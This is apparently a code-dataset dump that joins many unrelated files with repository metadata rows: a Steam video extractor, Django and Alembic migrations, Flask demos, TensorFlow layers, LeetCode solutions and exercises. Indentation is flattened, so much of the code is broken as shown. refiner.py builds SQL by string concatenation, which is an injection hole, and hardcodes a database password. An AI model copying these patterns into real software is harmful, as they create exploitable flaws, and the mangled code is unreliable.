(?P<urltype>video|app)/ #If the page is only for videos or for a game
(?P<gameID>\d+)/?
(?P<videoID>\d*)(?P<extra>\??) # For urltype == video we sometimes get the videoID
|
https?://(?:www\.)?steamcommunity\.com/sharedfiles/filedetails/\?id=(?P<fileID>[0-9]+)
"""
_VIDEO_PAGE_TEMPLATE = 'http://store.steampowered.com/video/%s/'
_AGECHECK_TEMPLATE = 'http://store.steampowered.com/agecheck/video/%s/?snr=1_agecheck_agecheck__age-gate&ageDay=1&ageMonth=January&ageYear=1970'
_TESTS = [{
'url': 'http://store.steampowered.com/video/105600/',
'playlist': [
{
'md5': '6a294ee0c4b1f47f5bb76a65e31e3592',
'info_dict': {
'id': '2040428',
'ext': 'mp4',
'title': 'Terraria 1.3 Trailer',
'playlist_index': 1,
}
},
{
'md5': '911672b20064ca3263fa89650ba5a7aa',
'info_dict': {
'id': '2029566',
'ext': 'mp4',
'title': 'Terraria 1.2 Trailer',
'playlist_index': 2,
}
}
],
'info_dict': {
'id': '105600',
'title': 'Terraria',
},
'params': {
'playlistend': 2,
}
}, {
'url': 'http://steamcommunity.com/sharedfiles/filedetails/?id=242472205',
'info_dict': {
'id': 'X8kpJBlzD2E',
'ext': 'mp4',
'upload_date': '20140617',
'title': 'FRONTIERS - Trapping',
'description': 'md5:bf6f7f773def614054089e5769c12a6e',
'uploader': 'AAD Productions',
'uploader_id': 'AtomicAgeDogGames',
}
}]
def _real_extract(self, url):
m = re.match(self._VALID_URL, url)
fileID = m.group('fileID')
if fileID:
videourl = url
playlist_id = fileID
else:
gameID = m.group('gameID')
playlist_id = gameID
videourl = self._VIDEO_PAGE_TEMPLATE % playlist_id
self._set_cookie('steampowered.com', 'mature_content', '1')
webpage = self._download_webpage(videourl, playlist_id)
if re.search('<h2>Please enter your birth date to continue:</h2>', webpage) is not None:
videourl = self._AGECHECK_TEMPLATE % playlist_id
self.report_age_confirmation()
webpage = self._download_webpage(videourl, playlist_id)
flash_vars = self._parse_json(self._search_regex(
r'(?s)rgMovieFlashvars\s*=\s*({.+?});', webpage,
'flash vars'), playlist_id, js_to_json)
playlist_title = None
entries = []
if fileID:
playlist_title = get_element_by_class('workshopItemTitle', webpage)
for movie in flash_vars.values():
if not movie:
continue
youtube_id = movie.get('YOUTUBE_VIDEO_ID')
if not youtube_id:
continue
entries.append({
'_type': 'url',
'url': youtube_id,
'ie_key': 'Youtube',
})
else:
playlist_title = get_element_by_class('apphub_AppName', webpage)
for movie_id, movie in flash_vars.items():
if not movie:
continue
video_id = self._search_regex(r'movie_(\d+)', movie_id, 'video id', fatal=False)
title = movie.get('MOVIE_NAME')
if not title or not video_id:
continue
entry = {
'id': video_id,
'title': title.replace('+', ' '),
}
formats = []
flv_url = movie.get('FILENAME')
if flv_url:
formats.append({
'format_id': 'flv',
'url': flv_url,
})
highlight_element = self._search_regex(
r'(<div[^>]+id="highlight_movie_%s"[^>]+>)' % video_id,
webpage, 'highlight element', fatal=False)
if highlight_element:
highlight_attribs = extract_attributes(highlight_element)
if highlight_attribs:
entry['thumbnail'] = highlight_attribs.get('data-poster')
for quality in ('', '-hd'):
for ext in ('webm', 'mp4'):
video_url = highlight_attribs.get('data-%s%s-source' % (ext, quality))
if video_url:
formats.append({
'format_id': ext + quality,
'url': video_url,
})
if not formats:
continue
entry['formats'] = formats
entries.append(entry)
if not entries:
raise ExtractorError('Could not find any videos')
return self.playlist_result(entries, playlist_id, playlist_title)
| [
"[email protected]"
] | |
4cb5c441bcba23fbc23e5964cb82056ad9278044 | 29b2818a5f336fd10b124871220e047cc86d1d38 | /companies/migrations/0004_auto_20180310_0505.py | 246f298f80c57afc244fcbf917b0cda3900d8f49 | [] | no_license | prsh-singh834006/foundationbackend | d7eebeb17b3d35ad94b8e44c832438b7ebed63e3 | 52c63b77f98e5d2d312d050f0ab2b4dab78368aa | refs/heads/master | 2021-03-30T21:02:17.392653 | 2018-03-10T06:30:45 | 2018-03-10T06:30:45 | 124,621,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | # Generated by Django 2.0.3 on 2018-03-10 05:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('companies', '0003_sku_subcategory_subcategory_sku'),
]
operations = [
migrations.DeleteModel(
name='Stock',
),
migrations.DeleteModel(
name='Users',
),
]
| [
"[email protected]"
] | |
2bf169f247955b023ed4eb2ef9238dea4e9d188b | 8b16e83dbc38f6714ee5d9ef9f9b43d16d51f1de | /hello.py | d9c6954e709b320806042665599c2737fb097292 | [] | no_license | shruthasivakumar/my-first-blog | 1ee03faeee4c57da0e8c0e867c58327f9efbbbed | 9595c5015ef1a26ba1393d21fa62d63afcf67634 | refs/heads/master | 2020-03-28T22:15:59.942373 | 2017-06-17T15:47:05 | 2017-06-17T15:47:05 | 94,626,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | def hi(name):
if name == 'Shrutha':
print('Hi Shrutha!')
print('Whats up?')
elif name == 'a':
print ('Hi A!')
else:
print ('Go away random person!')
hi('b')
| [
"[email protected]"
] | |
9b1a62a8beafa47b2bd59dfce771a8e37d810b5c | 53869930bd3989d4ea397b4dce42996fc1a33c1f | /compressed_network/layers/conv_layer.py | 5d3687bed9516fb65533680522f1abfe7e9d94df | [] | no_license | oanaucs/quant | 6e4963b912667f0adfc5e74a2832146f2db2a18d | b31bd8c17e5cf97cf12977f8b490ec33fab02740 | refs/heads/master | 2022-02-22T23:16:28.495165 | 2019-10-09T16:45:22 | 2019-10-09T16:45:22 | 212,675,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,239 | py | from layers.layer import layer_base
import tensorflow as tf
import numpy as np
class conv2d(layer_base):
def __init__(self,
in_depth,
out_depth,
kernel_size=[3, 3],
strides=[1, 1, 1, 1],
padding='SAME',
name=None,
reuse=None,
trainable=True):
self.name = name
self.kernel_size = [kernel_size[0],
kernel_size[1], in_depth, out_depth]
self.trainable = trainable
self.weights = tf.get_variable(name=self.name+'/weights',
shape=self.kernel_size, dtype=tf.float32,
initializer=tf.contrib.layers.xavier_initializer(),
trainable=self.trainable)
self.bias_weights = None
self.values = None
self.strides = strides
self.padding = padding
self.prune_mask = None
self.centroids = []
self.name = name
self.pruned_weights = tf.placeholder(tf.float32, self.weights.get_shape().as_list())
self.assign_op = tf.assign(self.weights, self.pruned_weights)
self.clusters_ph = tf.placeholder(tf.float32, self.weights.get_shape().as_list())
self.assign_clusters_op = tf.assign(self.weights, self.clusters_ph)
self.cast_op = tf.cast(self.weights, tf.int32)
def forward(self, input_tensor):
self.values = tf.nn.conv2d(
input_tensor, self.weights, strides=self.strides, padding=self.padding,
name=self.name)
if self.bias_weights is None:
values_shape = self.values.get_shape().as_list()
bias_shape = [values_shape[-1]]
self.bias_weights = tf.get_variable(name=self.name+'/biases',
shape=bias_shape, dtype=tf.float32,
initializer=tf.zeros_initializer(),
trainable=self.trainable)
self.bias_values = tf.nn.bias_add(self.values, self.bias_weights)
self.relu_values = tf.nn.relu(self.bias_values)
return self.relu_values
def shape(self):
if self.values:
return self.values.shape()
else:
return None
| [
"[email protected]"
] | |
f851dbbc0d86bc7b1053d5e0f1308049b8176273 | cab24ce6969b883b259ebf9a3731d913720acb48 | /flask-demos/basic-routing/server.py | b2fcc884ea07527b03c117d8c50dc63db0e20735 | [] | no_license | mgoshorn/191209-content-repo | e7f1a3e5079f60b10443839b13b8fc2d19c4ac63 | a37455dee84e6aa88844b49c961aa4d85181d624 | refs/heads/master | 2020-12-18T12:34:35.909532 | 2020-01-26T16:34:49 | 2020-01-26T16:34:49 | 235,383,039 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | from flask import Flask
app = Flask(__name__)
cats = ["Felix", "Fluffy", "Max", "Sylvester", "Tom", "Garfield"]
@app.route("/cats", methods=["GET"])
def get_cats():
return {
"data": cats
}
@app.route("/cats/<id>")
def get_cat(id):
if(not id.isnumeric()):
return "", 404
int_id = int(id)
if(int_id < 1 or int_id > len(cats)):
return "", 404
cat = cats[int_id-1]
return cat, 200
app.run(debug=True) | [
"[email protected]"
] | |
3e886595d306c6291467f18af56c5f7211ed1485 | 491d5306e68793b57be2a411c32b3f2651486766 | /migrations/versions/11090f350c03_.py | 58d57d0b18ca800d1baaa986fd7d681021a0b48b | [] | no_license | dygksquf5/flask_clone_project_api | 2a0e6db73a93f4e953040626102f16c841468613 | 5c6a0e59ed3b880ff8a3547f2616355262de62e9 | refs/heads/main | 2023-03-25T09:30:05.878500 | 2021-03-24T02:02:02 | 2021-03-24T02:02:02 | 349,996,153 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,135 | py | """empty message
Revision ID: 11090f350c03
Revises: 3fe6103ee496
Create Date: 2021-02-25 15:49:05.532642
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '11090f350c03'
down_revision = '3fe6103ee496'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('order_data', sa.Column('menu_id', sa.Integer(), nullable=True))
op.drop_constraint('order_data_menus_id_fkey', 'order_data', type_='foreignkey')
op.create_foreign_key(None, 'order_data', 'menus', ['menu_id'], ['id'])
op.drop_column('order_data', 'menus_id')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('order_data', sa.Column('menus_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.drop_constraint(None, 'order_data', type_='foreignkey')
op.create_foreign_key('order_data_menus_id_fkey', 'order_data', 'menus', ['menus_id'], ['id'])
op.drop_column('order_data', 'menu_id')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
fc7bec57fc4563f1bbd1ef2298e6effd6d920fbd | 38670d46158fe13f064a6b979110e26b935e459e | /SalesAppDir/SalesApp/wsgi.py | 5b1c6bad6d20e58a577e50ae51abf8e74d697e73 | [] | no_license | UnmsmCc/SalesApp | 1800522bea77ad7b2f09973b5a8601df1689e41f | df9a9e1585c6bbdddb495a2ad1ae1c8383742824 | refs/heads/master | 2022-08-23T12:56:41.961985 | 2020-05-20T21:27:36 | 2020-05-20T21:27:36 | 264,794,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | """
WSGI config for SalesApp project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'SalesApp.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
de98ff2cd4ae9314fdce7c59a0f7d52d331e49d4 | a9a0aa5af100ed752194e498b8e14073c13563d2 | /djcelery_errorlog/__init__.py | 529a8aa4b06d4b2e7d6c8097156d5ce395ede83b | [] | no_license | yjmade/django-celery-errorlog | 7948839165ebdbd805fe332fa39b98c9dd0b518b | 32306cfab2e5cb1f48f7692335a03f90379c0e95 | refs/heads/master | 2020-06-13T23:50:26.614640 | 2016-12-05T14:58:01 | 2016-12-05T14:58:01 | 75,542,638 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | # -*- coding: utf-8 -*-
def shared_task(*args, **kwargs):
from .models import CeleryError
return CeleryError.shared_task(*args, **kwargs)
def periodic_task(*args, **kwargs):
from .models import CeleryError
return CeleryError.periodic_task(*args, **kwargs)
| [
"[email protected]"
] | |
2812c81eda3824c27a60a84670e9ab8374c9207c | 03483eb845567a1ea783214c462d7d6ce7b97420 | /done/refiner.py | b8bf0e5b03b71da827b74fd929946af31983f826 | [] | no_license | vishaljain3991/reports2sql | 7a278d820ff65026edfb435822efac24cdd20e70 | 98a340a167501d45f036a8731f41434ea1f2f3f3 | refs/heads/master | 2021-01-01T19:20:33.129205 | 2014-06-27T15:01:56 | 2014-06-27T15:01:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,567 | py | #==========================
#PLEASE READ THE COMMENTS
#==========================
#Now we refine i.e. clean our database. In this file we open names.txt which contains the names of
#analysts as mentioned in the analysts_YYYY-MM-YY.txt file and alongside that only first and last names
#of the analysts. This file replaces all the instances of the names of full name of analyst with their
#first and last names.
import nltk
import os
import psycopg2
fo=open("names.txt", "rb+")
raw=fo.read()
conn = psycopg2.connect(database="finance", user="finance", password="iof2014", host="127.0.0.1", port="5432")
cur=conn.cursor()
#We split the text read from names.txt file using \n delimiter.
sents=raw.split('\n')
#Each sentence contains the full names of analyst alongwith their first and last names. We form a
#Dictionary where a full name points to first and last name.
index={} #forming a dictionary
for sent in sents:
if(sent!=''):
#We split every sentence into full name and "first name and last name" on the basis
#delimiter '#'
t=sent.split('#')
index[t[0]]=t[1]
#All the keys of dictionary we are basically refining our ratings1 table reducing names to just first and last names
print index['Christopher Wimmer, CFA']
#'CFA','CPA','Dr.' are the additional designations that comes with a person name, we separate them out and
#put it in a separate column called a1_add or a2_add depending on whether the person was 1st or 2nd anlayst
#on the report.
buzz=['CFA','CPA','Dr.']
for t in index.keys():
tokens=t.split(" ")
#For every full name we determine whether there is anything common between the set of words in token
#and the set of words in buzz. Generally, a name has only one designation if at all it has it. so
#if a name contains a designation the cardinality of intersected set comes out to be greater than or equal
#to one.
inter=list(set(tokens)&set(buzz)) #whether there is some intersection or not
if (len(inter)>0):
#Next, we add additional designation in a1_add or a2_add column for full names having additional desingnation
cur.execute("UPDATE RATINGS1 SET A1_ADD='"+inter[0]+"' WHERE A1_NAME='"+t+"';")
conn.commit()
cur.execute("UPDATE RATINGS1 SET A2_ADD='"+inter[0]+"' WHERE A2_NAME='"+t+"';")
conn.commit()
#Finally we update the a1_name or a2_name column with "full name and last name"
cur.execute("UPDATE RATINGS1 SET A1_NAME='"+index[t]+"' WHERE A1_NAME='"+t+"';")
conn.commit()
cur.execute("UPDATE RATINGS1 SET A2_NAME='"+index[t]+"' WHERE A2_NAME='"+t+"';")
conn.commit()
| [
"[email protected]"
] | |
3412d4feb9073a130e9a20924cf03b2d98444c14 | d8bb500d56d464d710209cfee5bc054b02adcea5 | /JobSchd/migrations/0002_auto_20171002_0016.py | 7306abbf78ebcc018a91e9727d3bf2482c2d291f | [] | no_license | siddarth306/PopGen | fb99cd98e93d5747a325e0a1b07d3ac50ed68428 | 84913d1d0eef9990d6bda956a32286518009298a | refs/heads/master | 2020-04-15T14:15:04.767830 | 2019-01-12T15:51:00 | 2019-01-12T15:51:00 | 164,747,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,499 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-02 00:16
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('JobSchd', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Job',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('job_priority', models.CharField(max_length=5)),
('job_name', models.CharField(max_length=50)),
('is_fav', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=50)),
('email', models.CharField(max_length=50)),
('password', models.CharField(max_length=50)),
],
),
migrations.RemoveField(
model_name='jobr',
name='user',
),
migrations.DeleteModel(
name='JobR',
),
migrations.AddField(
model_name='job',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='JobSchd.User'),
),
]
| [
"[email protected]"
] | |
0624cfcab1018e1fa3e300373e429924574f939d | c3f595359487019f807ac2a55f4ccd63cf6df0bf | /fluvirus.py | f0486865368e12fbe677e410276beaeddacfde87 | [] | no_license | afcarl/Influenza-Network-Transmission-Model | 391dbbd0034bf9de8950a17f1bcac68f0481739a | e82e22b153e643ba240b5721b511c6857bd9c049 | refs/heads/master | 2020-03-18T10:03:51.047195 | 2017-11-15T19:19:46 | 2017-11-15T19:19:46 | 134,595,340 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 299 | py | class FluVirus(Virus):
"""docstring for FluVirus"""
def __init__(self, id, creation_date, num_segments=2, parent=None, \
generate_sequence=False):
Virus.__init__(self, id=id, creation_date=creation_date, \
num_segments=num_segments, parent=parent, \
generate_sequence=generate_sequence) | [
"[email protected]"
] | |
0b951d9b1c6371d9c2405c5a067a5b58506d1322 | 902628a75d979c8636efe6ea0aaf616910f88336 | /setup.py | a955c0783c67269cd3aab92bfff811ede6aa37a3 | [] | no_license | jicuss/vertica_parity_env | 59d608bcfbfdaf6c1005a1c1a26d9d2f556ec2ef | f194c7a8797bac1b868f08aba373b84124892676 | refs/heads/master | 2021-01-17T16:04:24.591646 | 2016-08-19T22:18:31 | 2016-08-19T22:18:31 | 63,757,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,943 | py | """A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
from codecs import open # to maintain consistent encoding. May or may not use. TODO: remove if unused
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'VERSION.txt'), encoding='utf-8') as f:
version = f.read()
setup(name='vertica_parity',
version=version,
description='A set of scripts to setup a local vertica test environment',
# The project's main homepage.
url='https://www.github.com',
author='Joshua Icuss',
author_email='[email protected]',
# Choose your license
license='',
classifiers=[
'Programming Language :: Python :: 2.7',
],
packages=find_packages(exclude=['notes_do_not_include','logs','cache','vertica_parity_environment']),
# Include non-python files found in each package in the install.
include_package_data=True,
package_data={
# If any package contains *.json files, include them:
'': ['*.json', '*.sql', ],
},
install_requires=['pyodbc'],
tests_require=['mock'],
test_suite='tests',
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,tests]
extras_require={
'dev': [
'mock',
],
'rel': [
'mock',
'wheel'
]
},
entry_points={
'console_scripts': [
'parse_workflow=entry_points:parseWorkflow',
'create_copy_commands=entry_points:createCopyCommands',
'generate_example_copy_json=entry_points:generateExampleCopyJSON',
],
},
) | [
"[email protected]"
] | |
1345a55a79a3c655f98786f58ee490a95f15db27 | 17f6881c70401dc63757cc7b5fa4d9dd396689e3 | /src/main/com/libin/yfl/35.py | ff1d09e4298aea219272d6797699a0d458c2ada6 | [] | no_license | BigDataRoad/Algorithm | 0ab493eeb478125b4beb62d78ce18c73e30b0496 | 2f2fb4f4b84f6c9df8adbada63b327c43ce29ddd | refs/heads/master | 2023-07-02T04:06:51.025648 | 2021-07-28T14:04:55 | 2021-07-28T14:04:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,113 | py | # coding:utf-8
'''
1221. 分割平衡字符串
在一个「平衡字符串」中,'L' 和 'R' 字符的数量是相同的。
给出一个平衡字符串 s,请你将它分割成尽可能多的平衡字符串。
返回可以通过分割得到的平衡字符串的最大数量。
示例 1:
输入:s = "RLRRLLRLRL"
输出:4
解释:s 可以分割为 "RL", "RRLL", "RL", "RL", 每个子字符串中都包含相同数量的 'L' 和 'R'。
示例 2:
输入:s = "RLLLLRRRLR"
输出:3
解释:s 可以分割为 "RL", "LLLRRR", "LR", 每个子字符串中都包含相同数量的 'L' 和 'R'。
示例 3:
输入:s = "LLLLRRRR"
输出:1
解释:s 只能保持原样 "LLLLRRRR".
'''
class Solution:
def balancedStringSplit(self, s: str) -> int:
r_count = 0
l_count = 0
all_count = 0
for each in s:
if each == 'R':
r_count += 1
elif each == 'L':
l_count += 1
if r_count == l_count:
all_count += 1
r_count = 0
l_count = 0
return all_count
| [
"[email protected]"
] | |
e4d45620eb41d7e65c1a758b74401b7fa074da8d | 17934999db777fb173c98facb7e90263589d879a | /leetcode/148.py | 8cee1cd0aaa1927cd749f601ca4d1b4df4e43b8d | [] | no_license | helunxing/algs | 2196730bd9daeaecd3504ad84e3e0ddca751953f | ca9629f5bf2177275688d70b12e10e442ad67a84 | refs/heads/main | 2023-02-18T07:03:09.488423 | 2022-05-16T00:18:01 | 2022-05-16T00:18:01 | 136,946,860 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,028 | py | # Definition for singly-linked list.
from typing import List
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution0:
def sortList(self, head: ListNode) -> ListNode:
if not head:
return head
last = fast = slow = head
while fast:
last = slow
slow = slow.next
fast = fast.next
fast = fast.next if fast else fast
if fast == slow:
return head
last.next = None
return self.merge(self.sortList(head), self.sortList(slow))
def merge(self, l1, l2):
dummy = curr = ListNode(0)
while l1 and l2:
if l1.val > l2.val:
curr.next = l2
curr = curr.next
l2 = l2.next
else:
curr.next = l1
curr = curr.next
l1 = l1.next
if l1 or l2:
curr.next = l1 if l1 else l2
return dummy.next
nodes = [4, 2, 1, 3]
fast = dummy = ListNode(0)
for i in nodes:
fast.next = ListNode(i)
fast = fast.next
s = Solution()
ans = s.sortList(dummy.next)
class Solution:
def sortList(self, head: ListNode) -> ListNode:
if not head or not head.next:
return head
last = slow = fast = head
while fast:
last = slow
fast = fast.next
slow = slow.next
fast = fast.next if fast else fast
l1 = head
l2 = last.next
last.next = None
return self.merge(self.sortList(l1), self.sortList(l2))
def merge(self, l1, l2):
dummy = ListNode(0)
curr = dummy
while l1 and l2:
if l1.val > l2.val:
curr.next = l2
l2 = l2.next
else:
curr.next = l1
l1 = l1.next
curr = curr.next
if l1:
curr.next = l1
if l2:
curr.next = l2
return dummy.next
| [
"[email protected]"
] | |
8857f76b42fd2327914de953db3299ebc147db0c | e73b68643093aee333254e05658a711c17a656b0 | /authorization/migrations/0009_auto_20210128_0449.py | 92c747acae17c57d832ab97a811ebbd0babc5e25 | [] | no_license | Brahim2007/PaperMetrix | 4d7fe27612066b97f4c824cf233961ca59b95b09 | 8ae8a2e367ba2bab6f271f4f64256f6675b1cf78 | refs/heads/master | 2023-05-25T18:41:16.101357 | 2023-04-29T09:49:21 | 2023-04-29T09:49:21 | 373,526,954 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | # Generated by Django 3.1 on 2021-01-27 23:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('authorization', '0008_auto_20210128_0447'),
]
operations = [
migrations.AlterField(
model_name='user',
name='user_roles',
field=models.CharField(blank=True, choices=[('researcher', 'Researcher'), ('lecturer_senior', 'Lecturer - Senior Lecturer'), ('lecturer', 'Lecturer'), ('professor', 'Professor'), ('librarian', 'Librarian'), ('student_doctoral', 'Student - Doctoral Student'), ('student_master', 'Student - Master'), ('student_bachelor', 'Student - Bachelor'), ('student_phd', 'Student - Ph. D. Student'), ('other', 'Other')], max_length=20, null=True),
),
]
| [
"[email protected]"
] | |
a091250c35f7d8af56e48fde5a3b7559b25e7bd1 | 1427ebf65db634031540e75e22f394c8f1c55ed4 | /article/migrations/0005_auto_20190121_2249.py | 051b8b0fc3924892eb6570cd7f405ba960c80742 | [] | no_license | ulasdgndnz/django-blog | 95e189e7d12cf14a1b0f8dbca3bd5b76e5a59808 | 83e62390db6a802eb23468b5b640da5d3a7e253f | refs/heads/master | 2023-07-13T06:55:26.148715 | 2021-08-31T19:18:27 | 2021-08-31T19:18:27 | 167,540,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | # Generated by Django 2.1.5 on 2019-01-21 19:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('article', '0004_auto_20190121_2214'),
]
operations = [
migrations.AlterModelOptions(
name='article',
options={'ordering': ['-created_date']},
),
migrations.AlterModelOptions(
name='comment',
options={'ordering': ['-comment_date']},
),
]
| [
"[email protected]"
] | |
6006274e5db45332602c0130dd859ac4d50d3679 | 99bd4d86aeb26f0cb9099d5d0396b4f11d440f65 | /venv/lib/python3.7/genericpath.py | 60866365235ad66165bd58294761ad4a9a94f451 | [] | no_license | mmorrison1670/django-marriageability | f173d305afdc0343ee5776bdbca5ca1d60098dba | 31915636bcf9cb417b2243479a910c45cfc3a3aa | refs/heads/master | 2020-06-13T17:51:41.712358 | 2019-07-06T12:55:25 | 2019-07-06T12:55:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | /Users/mtm101/anaconda3/lib/python3.7/genericpath.py | [
"[email protected]"
] | |
010b33569d32d22e7299f5fbaccf1087498d35fd | 093180c6c3d1f1474a2037461286429ccbb7029f | /Ejercicios semana3/6.py | 54fbd9fcc8bb0f2f773814a68ab49a822f4c3ed6 | [] | no_license | DiegoxK/MisionTIC2022 | 2f143aa2d2d44122bad03d90b45a75794659b1d7 | eae7552830be2bd9b1a95d836eacc45be3c553ff | refs/heads/main | 2023-06-23T17:47:50.289990 | 2021-07-26T01:21:34 | 2021-07-26T01:21:34 | 381,203,172 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,650 | py | # Ejercicios
#6. Realizar un programa que permita cargar dos listas de 15 valores cada una. Informar con
#un mensaje cuál de las dos listas tiene un valor acumulado mayor (mensajes "Lista 1
#mayor", "Lista 2 mayor", "Listas iguales")
#Algoritmo:
"""
-Ingresar los valores por input de ambas listas
-realizar 15 iteraciones y sumar los datos dentro de las listas
-comparar las listas
si la lista 1 es mayor
imprimir(La lista 1 es la mayor)
si la lista 2 es mayor
imprimir(la lista 2 es la mayor)
si ambas listas tienen el mismo tamaño
imprimir(ambas listas tienen el mismo tamaño)
"""
#Resultado esperado:
"""
---------------------------------------------------------------
Input1 =
Output =
---------------------------------------------------------------
---------------------------------------------------------------
"""
#Transcripcion y verificacion del resultado:
def listsizes1():
totallists = {"total1":0, "total2":0}
list1 = []
list2 = []
for x in range(15):
number1 = int(input("Enter the first list number: "))
list1.append(number1)
totallists["total1"] += number1
number2 = int(input("Enter the second list number: "))
totallists["total2"] += number2
list2.append(number2)
if totallists["total1"] > totallists["total2"]:
print("The first ({}) list is higher that the second ({})".format(totallists["total1"],totallists["total2"]))
elif totallists["total1"] < totallists["total2"]:
print("The second list ({1}) is higher that the first one ({0})".format(totallists["total1"],totallists["total2"]))
elif totallists["total1"] == totallists["total2"]:
print("Both list are same ({}) = ({})".format(totallists["total1"],totallists["total2"]))
def listsizes2():
totallists = {"total1":0, "total2":0}
list1 = [12,43,56,7,9,5,32,12,4,6,7,8,1,3,5]
list2 = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
for x in range(15):
totallists["total1"] += list1[x]
totallists["total2"] += list2[x]
if totallists["total1"] > totallists["total2"]:
print("The first ({}) list is higher that the second ({})".format(totallists["total1"],totallists["total2"]))
elif totallists["total1"] < totallists["total2"]:
print("The second list ({1}) is higher that the first one ({0})".format(totallists["total1"],totallists["total2"]))
elif totallists["total1"] == totallists["total2"]:
print("Both list are same ({}) = ({})".format(totallists["total1"],totallists["total2"]))
| [
"[email protected]"
] | |
da51364f707eb4935e28a9d9217829d8d5d91ab9 | 84dcf2731f83a44cc02c75249911ecd2aafe2f91 | /constants.py | d0b987edf568de32ee6c05d30261bbe4ded56c15 | [
"MIT"
] | permissive | xuefei1/Graph-Seq2Attn | 74a765dc44effa6b84077b40476b5985fcd96e5a | 336c69877e483c95d9996ee205d2a005342f08af | refs/heads/master | 2020-12-04T17:02:16.139122 | 2020-04-16T16:36:42 | 2020-04-16T16:36:42 | 231,847,054 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,682 | py | # one identifier for one types of dict
# for instance, DK_SOME_KEY means this is a key for a data_dict
DK_BATCH_SIZE = "batch_size"
DK_PAD = "pad" # DK: general purpose data_dict
DK_SRC_WID = "src_wid" # src = msg + ctx
DK_SRC_WID_MASK = "src_wid_mask"
DK_SRC_SEQ_MASK = "src_seq_mask"
DK_MSG_WID = "msg_wid" # msg is usually shorter than ctx
DK_MSG_WID_MASK = "msg_wid_mask"
DK_CTX_WID = "ctx_wid" # msg is usually shorter than ctx
DK_CTX_WID_MASK = "ctx_wid_mask"
DK_SRC_POS = "src_pos"
DK_SRC_NER = "src_ner"
DK_SRC_SEG_LISTS = "src_seg_lists"
DK_TGT_GEN_WID = "tgt_gen_wid"
DK_TGT_CPY_WID = "tgt_cpy_wid"
DK_TGT_CPY_GATE = "tgt_cpy_gate"
DK_TGT_N_TOKEN = "tgt_n_token"
DK_TGT_SEG_LISTS = "tgt_seg_lists"
DK_SRC_IOB = "src_iob" # iob: SQuAD QG specific
DK_DOC_WID = "doc_wid"
DK_DOC_SEG_LISTS = "doc_seg_lists"
DK_DOC_WID_MASK = "doc_wid_mask"
DK_DOC_SENTS_WID = "doc_sents_wid"
DK_DOC_SENTS_WID_MASK = "doc_sents_wid_mask"
DK_TITLE_WID = "title_wid"
DK_TQ_SEG_LISTS = "title_seg_lists"
DK_TITLE_WID_MASK = "title_wid_mask"
DK_CONCEPT_SEG_LISTS = "concept_seg_lists"
DK_TGT_CONCEPT_GEN_WID = "tgt_concept_gen_wid" # concept gen specific
DK_TGT_CONCEPT_CPY_WID = "tgt_concept_cpy_wid"
DK_TGT_CONCEPT_CPY_GATE = "tgt_concept_cpy_gate"
DK_TGT_CONCEPT_N_TOKEN = "tgt_concept_n_token"
DK_TGT_TITLE_GEN_WID = "tgt_title_gen_wid" # title gen specific
DK_TGT_TITLE_CPY_WID = "tgt_title_cpy_wid"
DK_TGT_TITLE_CPY_GATE = "tgt_title_cpy_gate"
DK_TGT_TITLE_N_TOKEN = "tgt_title_n_token"
DK_SENT_DEPEND_GRAPH_LIST = "sent_depend_graph_list"
DK_DOC_KW_DIST_GRAPH = "doc_kw_dist_graph"
DK_DOC_SENT_MEAN_TFIDF_SIM_GRAPH = "doc_sent_mean_tfidf_sim_graph"
DK_DOC_SENT_PAIR_TFIDF_SIM_GRAPH = "doc_sent_pair_tfidf_sim_graph"
